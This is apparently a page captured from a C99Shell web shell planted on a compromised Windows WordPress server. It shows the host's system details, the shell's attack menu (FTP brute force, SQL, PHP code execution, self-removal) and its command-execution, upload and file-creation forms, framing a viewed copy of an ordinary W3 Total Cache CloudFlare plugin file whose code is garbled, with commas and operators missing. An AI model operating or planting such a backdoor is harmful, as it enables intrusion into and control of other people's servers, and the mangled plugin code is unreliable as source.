!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

C:\cumbreclima\wp-content\plugins\w3-total-cache\extensions\   drwxrwxrwx
Free 4.11 GB of 39.52 GB (10.4%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     CloudFlare.php (3.19 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

/**
 * W3 ObjectCache plugin
 */
if (!defined('W3TC')) {
    die();
}
define('W3TC_MARKER_BEGIN_CLOUDFLARE''# BEGIN W3TC CloudFlare');
define('W3TC_MARKER_END_CLOUDFLARE''# END W3TC CloudFlare');

w3_require_once(W3TC_LIB_W3_DIR '/Plugin.php');

/**
 * Class W3_Plugin_CloudFlare
 */
class W3_Plugin_CloudFlare extends W3_Plugin{
    
/**
     * @var CloudFlareAPI $cf
     */
    
private $cf;

    
/**
     * Runs plugin
     */
    
function run() {
        
w3_require_once(W3TC_CORE_EXTENSION_DIR'/CloudFlare/CloudFlareAPI.php');
        
$this->cf = new CloudFlareAPI();
        
add_action('wp_set_comment_status', array($this'set_comment_status'), 12);
        
add_action('w3tc_flush_all', array($this'flush_all'));
        
$this->cf->fix_remote_addr();
    }

    public function 
flush_all() {
        
$this->flush_cloudflare();
    }

    
/**
     * @param $id
     * @param $status
     */
    
function set_comment_status($id$status) {
        
$this->cf->report_if_spam($id$status);
    }

    
/**
     * @param $state
     * @return bool
     */
    
public function send_minify_headers($state) {
        
/**
         * @var W3_Config $config
         */
        
$config w3_instance('W3_Config');
        return (
$config->get_boolean('cloudflare.enabled') && !$this->cf->minify_enabled());
    }


    
/**
     * Purge the CloudFlare cache
     * @return void
     */
    
function flush_cloudflare() {
        
$response null;

        
w3_require_once(W3TC_LIB_W3_DIR '/Request.php');

        
$email $this->_config->get_string('email');
        
$key $this->_config->get_string('key');
        
$zone $this->_config->get_string('zone');


        if (
$email && $key && $zone) {
            
$config = array(
                
'email' => $email,
                
'key' => $key,
                
'zone' => $zone
            
);

            
w3_require_once(W3TC_CORE_EXTENSION_DIR '/CloudFlare/CloudFlareAPI.php');
            @
$cloudflareAPI = new CloudFlareAPI($config);
            
$cloudflareAPI->purge();
        }
    }

    public function 
menu_bar($menu_items) {
            
$menu_items array_merge($menu_items, array(
                array(
                    
'id' => 'cloudflare',
                    
'title' => __('CloudFlare''w3-total-cache'),
                    
'href' => 'https://www.cloudflare.com'
                
),
                array(
                    
'id' => 'cloudflare-my-websites',
                    
'parent' => 'cloudflare',
                    
'title' => __('My Websites''w3-total-cache'),
                    
'href' => 'https://www.cloudflare.com/my-websites.html'
                
),
                array(
                    
'id' => 'cloudflare-analytics',
                    
'parent' => 'cloudflare',
                    
'title' => __('Analytics''w3-total-cache'),
                    
'href' => 'https://www.cloudflare.com/analytics.html'
                
),
                array(
                    
'id' => 'cloudflare-account',
                    
'parent' => 'cloudflare',
                    
'title' => __('Account''w3-total-cache'),
                    
'href' => 'https://www.cloudflare.com/my-account.html'
                
)
            ));
        return 
$menu_items;
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0156 ]--